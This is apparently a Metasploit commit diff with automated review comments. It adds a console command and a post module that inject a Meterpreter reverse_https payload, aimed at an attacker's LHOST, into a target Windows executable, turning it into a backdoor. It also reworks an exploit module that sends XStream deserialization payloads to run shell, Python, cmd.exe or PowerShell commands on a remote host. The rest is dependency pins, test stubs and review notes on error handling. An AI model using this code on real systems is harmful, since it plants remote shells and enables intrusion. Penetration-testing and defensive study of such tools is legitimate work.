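+def injectpe_usage
+print_line('Usage: injectpe -p < windows/meterpreter/reverse_https > -t < c:\target_file.exe >, -o < lhost=192.168.1.123, lport=4443 >')
+print_line
+print_line('Inject a shellcode on the target executable.')
+print_line(@@injectpe_opts.usage)
+end
+#
+# Inject a given shellcode into a remote executable
+#
+def cmd_injectpe(*args)
+if args.length == 0 || args.include?('-h')
+injectpe_usage
+return false
+end
+opts = {
+payload: nil,
+targetpe: nil,
+options: nil
+}
+@@injectpe_opts.parse(args) { |opt, idx, val|
+case opt
+when '-p'
+opts[:payload] = val
+when '-t'
+opts[:targetpe] = val
+when '-o'
+opts[:options] = val
+end
+}
+payload = create_payload(opts[:payload], opts[:options])
+inject_payload(payload, opts[:targetpe])
+end
+# Create a payload given a name, lhost and lport, additional options
+def create_payload(name, opts = "")
+pay = client.framework.payloads.create(name)
+pay.datastore['EXITFUNC'] = 'thread'
+pay.available_space = 1.gigabyte # this is to generate a proper uuid and make the payload to work with the universal handler
+if not opts.blank?
+opts.split(",").each do |o|
+opt,val = o.split("=",2)
+pay.datastore[opt] = val
+end
+end
+# Validate the options for the module
+pay.options.validate(pay.datastore)
+return pay
+end
+def inject_payload(pay, targetpe)
+begin
+print_status("Generating payload")
+raw = pay.generate
+param = {}
+if pay.arch.join == ARCH_X64
+threaded_shellcode = client.peinjector.add_thread_x64(raw)
+param[:isx64] = true
+else
+threaded_shellcode = client.peinjector.add_thread_x86(raw)
+param[:isx64] = false
+end
+param[:shellcode] = threaded_shellcode
+param[:targetpe] = targetpe
+param[:size] = threaded_shellcode.length;
+print_status("Injecting #{pay.name} into the executable #{targetpe}")
+client.peinjector.inject_shellcode(param)
+print_good("Successfully injected payload into the executable: #{targetpe}")
+rescue ::Exception => e
+print_error("Failed to Inject Payload to executable #{targetpe}!")
+print_error(e.to_s)
+end
+end
+end
+end
+end
+end
+end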
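Review bot: `cmd_injectpe` never verifies that `-p` and `-t` were supplied: `create_payload(nil, …)` reaches `client.framework.payloads.create(nil)`, and since `payloads.create` returns nil for an unknown name the next line `pay.datastore['EXITFUNC'] = 'thread'` fails with NoMethodError instead of a usable message, while a missing `-t` sends `targetpe = nil` to the server. Guarding early, `return injectpe_usage unless opts[:payload] && opts[:targetpe]` in `cmd_injectpe` and `raise ArgumentError, "Unknown payload: #{name}" unless pay` in `create_payload`, covers both. Unlike the post module in this commit, which rejects anything outside `payloads.keys.grep(/windows/)`, the console command accepts any payload name, so a non-Windows payload is only caught, if at all, when the stub is built. `rescue ::Exception` in `inject_payload` also swallows Interrupt and SystemExit; `rescue ::StandardError => e` is the intended scope.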


@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
# are needed when there's no database # are needed when there's no database
spec.add_runtime_dependency 'metasploit-model' spec.add_runtime_dependency 'metasploit-model'
# Needed for Meterpreter # Needed for Meterpreter
spec.add_runtime_dependency 'metasploit-payloads', '1.3.43' spec.add_runtime_dependency 'metasploit-payloads', '1.3.45'
# Needed for the next-generation POSIX Meterpreter # Needed for the next-generation POSIX Meterpreter
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.4.1' spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.4.1'
# Needed by msfgui and other rpc components # Needed by msfgui and other rpc components
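Review bot: The gemspec now requires `metasploit-payloads` 1.3.45, but the Gemfile.lock hunks in this same commit bump it only to 1.3.44, so the lock no longer satisfies the gemspec and a frozen or deployment bundle will refuse to install until the lock is regenerated. One of the two should be changed so the pin and the lock agree.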


@ -25,7 +25,7 @@ metadata = {
'date': '2018-02-06', 'date': '2018-02-06',
'references': [ 'references': [
{'type': 'cve', 'ref': 'CVE-2018-6317'}, {'type': 'cve', 'ref': '2018-6317'},
{'type': 'edb', 'ref': '43972'}, {'type': 'edb', 'ref': '43972'},
{'type': 'url', 'ref': 'https://github.com/nanopool/Claymore-Dual-Miner'} {'type': 'url', 'ref': 'https://github.com/nanopool/Claymore-Dual-Miner'}
], ],


@ -37,25 +37,33 @@ class MetasploitModule < Msf::Exploit::Remote
'Targets' => [ 'Targets' => [
['Unix (In-Memory)', ['Unix (In-Memory)',
'Platform' => 'unix', 'Platform' => 'unix',
'Arch' => ARCH_CMD 'Arch' => ARCH_CMD,
'Type' => :unix_memory
],
['Windows (In-Memory)',
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Type' => :win_memory
], ],
['Python (In-Memory)', ['Python (In-Memory)',
'Platform' => 'python', 'Platform' => 'python',
'Arch' => ARCH_PYTHON 'Arch' => ARCH_PYTHON,
'Type' => :py_memory
], ],
=begin this stuff that doesn't work yet
['PowerShell (In-Memory)', ['PowerShell (In-Memory)',
'Platform' => 'win', 'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64] 'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh_memory
], ],
=end
['Linux (Dropper)', ['Linux (Dropper)',
'Platform' => 'linux', 'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64] 'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper
], ],
['Windows (Dropper)', ['Windows (Dropper)',
'Platform' => 'win', 'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64] 'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :win_dropper
] ]
], ],
'DefaultTarget' => 0 'DefaultTarget' => 0
@ -68,38 +76,34 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def check def check
if execute_command(random_crap) return CheckCode::Appears if execute_command(random_crap)
CheckCode::Appears
else CheckCode::Safe
CheckCode::Safe
end
end end
def exploit def exploit
case target.name case target['Type']
when /Unix/, /Python/, /PowerShell/ when /memory/
execute_command(payload.encoded) execute_command(payload.encoded)
else when /dropper/
execute_cmdstager execute_cmdstager
end end
end end
#
# Exploit methods
#
def execute_command(cmd, opts = {}) def execute_command(cmd, opts = {})
cmd = case target.name cmd =
when /Unix/, /Linux/ case target['Type']
%W{/bin/sh -c #{cmd}} when :unix_memory, :linux_dropper
when /Python/ %W{/bin/sh -c #{cmd}}
%W{python -c #{cmd}} when :py_memory
when /PowerShell/ %W{python -c #{cmd}}
# This doesn't work yet when :psh_memory
%W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}} opts = {remove_comspec: true, encode_final_payload: true}
when /Windows/ payload ? cmd_psh_payload(cmd, payload.arch, opts).split :
%W{cmd.exe /c #{cmd}} %W{powershell.exe -c #{cmd}}
end when :win_memory, :win_dropper
%W{cmd.exe /c #{cmd}}
end
# Encode each command argument with XML entities # Encode each command argument with XML entities
cmd.map! { |arg| arg.encode(xml: :text) } cmd.map! { |arg| arg.encode(xml: :text) }
@ -111,7 +115,9 @@ class MetasploitModule < Msf::Exploit::Remote
'data' => xstream_payload(cmd) 'data' => xstream_payload(cmd)
) )
check_response(res) || fail_with(Failure::UnexpectedReply, res.inspect) return false unless check_response(res)
true
end end
# java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO # java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO
@ -175,10 +181,6 @@ class MetasploitModule < Msf::Exploit::Remote
EOF EOF
end end
#
# Utility methods
#
def check_response(res) def check_response(res)
res && res.code == 500 && res.body.include?(error_string) res && res.code == 500 && res.body.include?(error_string)
end end
@ -188,7 +190,7 @@ EOF
end end
def random_crap def random_crap
Rex::Text.rand_text_alphanumeric(rand(42) + 1) Rex::Text.rand_text_alphanumeric(8..42)
end end
end end
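Review bot: `execute_command` now returns false on an unexpected reply instead of calling `fail_with`, but the rewritten `exploit` discards that value for every `/memory` target, so a delivery the server rejects ends with the generic "no session was created" rather than a stated failure; `fail_with(Failure::UnexpectedReply, 'Unexpected reply from target') unless execute_command(payload.encoded)` restores the old behaviour for that path. The `execute_cmdstager` path presumably drives `execute_command` per chunk through the mixin and loses the same check, which is harder to restore from here. The `:psh_memory` arm also splits the `cmd_psh_payload` output on whitespace, which only holds while no argument of the generated powershell command contains a space — a comment recording that assumption, `# split is safe only while the generated command has no space-bearing arguments`, would help whoever adds a flag later.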


@ -0,0 +1,107 @@
require 'rex'
require 'msf/core/post/common'
class MetasploitModule < Msf::Post
include Msf::Post::Common
def initialize(info={})
super( update_info( info,
'Name' => 'Peinjector',
'Description' => %q{
This module will inject a specified windows payload into a target executable.
},
'License' => MSF_LICENSE,
'Author' => [ 'Maximiliano Tedesco <maxitedesco1@gmail.com>'],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
register_options(
[
OptString.new('PAYLOAD', [false, 'Windows Payload to inject into the targer executable.', "windows/meterpreter/reverse_https"]),
OptAddress.new('LHOST', [true, 'IP of host that will receive the connection from the payload.']),
OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]),
OptString.new('TARGETPE', [false, 'Path of the target executable to be injected']),
OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format."])
]
)
end
# Run Method for when run command is issued
def run
session.core.use('peinjector')
# syinfo is only on meterpreter sessions
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
# Check that the payload is a Windows one and on the list
if not session.framework.payloads.keys.grep(/windows/).include?(datastore['PAYLOAD'])
print_error("The Payload specified #{datastore['PAYLOAD']} is not a valid for this system")
return
end
# Set variables
pay_name = datastore['PAYLOAD']
lhost = datastore['LHOST']
lport = datastore['LPORT']
targetpe = datastore['TARGETPE']
opts = datastore['OPTIONS']
# Create payload
payload = create_payload(pay_name, lhost, lport, opts)
# Inject payload
inject_payload(payload, targetpe)
end
# Create a payload given a name, lhost and lport, additional options
def create_payload(name, lhost, lport, opts = "")
pay = client.framework.payloads.create(name)
pay.datastore['LHOST'] = lhost
pay.datastore['LPORT'] = lport
pay.datastore['EXITFUNC'] = 'thread'
pay.available_space = 1.gigabyte # this is to generate a proper uuid and make the payload to work with the universal handler
if not opts.blank?
opts.split(",").each do |o|
opt,val = o.split("=",2)
pay.datastore[opt] = val
end
end
# Validate the options for the module
pay.options.validate(pay.datastore)
return pay
end
def inject_payload(pay, targetpe)
begin
print_status("Generating payload")
raw = pay.generate
param = {}
if pay.arch.join == ARCH_X64
threaded_shellcode = client.peinjector.add_thread_x64(raw)
param[:isx64] = true
else
threaded_shellcode = client.peinjector.add_thread_x86(raw)
param[:isx64] = false
end
param[:shellcode] = threaded_shellcode
param[:targetpe] = targetpe
param[:size] = threaded_shellcode.length;
print_status("Injecting #{pay.name} into the executable #{param[:targetpe]}")
client.peinjector.inject_shellcode(param)
print_good("Successfully injected payload into the executable: #{param[:targetpe]}")
rescue ::Exception => e
print_error("Failed to Inject Payload to executable #{param[:targetpe]}!")
print_error(e.to_s)
end
end
end
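Review bot: `rescue ::Exception => e` in inject_payload catches Interrupt, SystemExit and NoMemoryError together with the failures it is meant to report, so a Ctrl-C during the peinjector call is swallowed and printed as an injection failure; `rescue ::StandardError => e` is the safe form here. TARGETPE is declared optional (`[false, ...]`) but inject_payload hands it straight to inject_shellcode, so a run without it can only fail inside the rescue block; `OptString.new('TARGETPE', [true, 'Path of the target executable to be injected'])` makes the framework reject that before anything is generated. The failure message in that rescue block reads `param[:targetpe]`, which is assigned only after pay.generate and the add_thread call succeed, so an exception from either of those prints "to executable !" with no path — `print_error("Failed to Inject Payload to executable #{targetpe}!")` uses the argument that is always set. Smaller points: `if not` reads better as `unless`, the trailing `;` after `threaded_shellcode.length` is a leftover, and "targer" in the TARGETPE description and "syinfo" in the run comment are typos.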


@ -84,6 +84,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
" CI", " CI",
" Foundstone", " Foundstone",
" FusionVM XML", " FusionVM XML",
" Group Policy Preferences Credentials",
" IP Address List", " IP Address List",
" IP360 ASPL", " IP360 ASPL",
" IP360 XML v3", " IP360 XML v3",


@ -21,6 +21,7 @@ RSpec.shared_examples_for 'Msf::DBManager::Import' do
it_should_behave_like 'Msf::DBManager::Import::CI' it_should_behave_like 'Msf::DBManager::Import::CI'
it_should_behave_like 'Msf::DBManager::Import::Foundstone' it_should_behave_like 'Msf::DBManager::Import::Foundstone'
it_should_behave_like 'Msf::DBManager::Import::FusionVM' it_should_behave_like 'Msf::DBManager::Import::FusionVM'
it_should_behave_like 'Msf::DBManager::Import::GPP'
it_should_behave_like 'Msf::DBManager::Import::IP360' it_should_behave_like 'Msf::DBManager::Import::IP360'
it_should_behave_like 'Msf::DBManager::Import::IPList' it_should_behave_like 'Msf::DBManager::Import::IPList'
it_should_behave_like 'Msf::DBManager::Import::Libpcap' it_should_behave_like 'Msf::DBManager::Import::Libpcap'


@ -0,0 +1,3 @@
RSpec.shared_examples_for 'Msf::DBManager::Import::GPP' do
it { is_expected.to respond_to :import_gpp_xml }
end